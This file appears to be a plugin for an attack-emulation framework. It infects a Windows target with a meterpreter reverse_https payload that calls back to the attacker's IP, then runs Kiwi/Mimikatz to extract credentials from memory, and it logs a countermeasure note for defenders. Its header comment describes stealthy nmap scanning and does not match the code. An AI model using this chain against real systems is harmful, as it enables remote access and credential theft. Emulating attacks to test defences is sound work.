#!/usr/bin/env python3
# A plugin to nmap targets slow motion, to evade sensors
from plugins . base . attack import AttackPlugin , Requirement
import socket
class MetasploitKiwiPlugin ( AttackPlugin ) :
# Boilerplate
name = " metasploit_kiwi "
description = " Extract credentials from memory. Kiwi is the more modern Mimikatz "
ttp = " T1003 "
references = [ " https://www.hackers-arise.com/post/2018/11/26/metasploit-basics-part-21-post-exploitation-with-mimikatz " ]
required_files = [ ] # Files shipped with the plugin which are needed by the kali tool. Will be copied to the kali share
requirements = [ Requirement . METASPLOIT ]
def __init__ ( self ) :
super ( ) . __init__ ( )
self . plugin_path = __file__
def run ( self , targets ) :
""" Run the command
@param targets : A list of targets , ip addresses will do
"""
self . attack_logger . start_narration ( " Extracting user credentials from memory. " )
res = " "
payload_type = " windows/x64/meterpreter/reverse_https "
payload_name = " babymetal.exe "
target = self . targets [ 0 ]
ip = socket . gethostbyname ( self . attacker_machine_plugin . get_ip ( ) )
self . metasploit . smart_infect ( target ,
payload = payload_type ,
architecture = " x64 " ,
platform = " windows " ,
lhost = ip ,
format = " exe " ,
outfile = payload_name )
self . metasploit . kiwi ( target ,
variant = self . conf [ ' variant ' ] ,
situation_description = " Kiwi is the modern version of mimikatz. It is integrated into metasploit. The attacker wants to get some credentials - reading them from memory. " ,
countermeasure = " Memory access into critical processes should be monitored. "
)
return res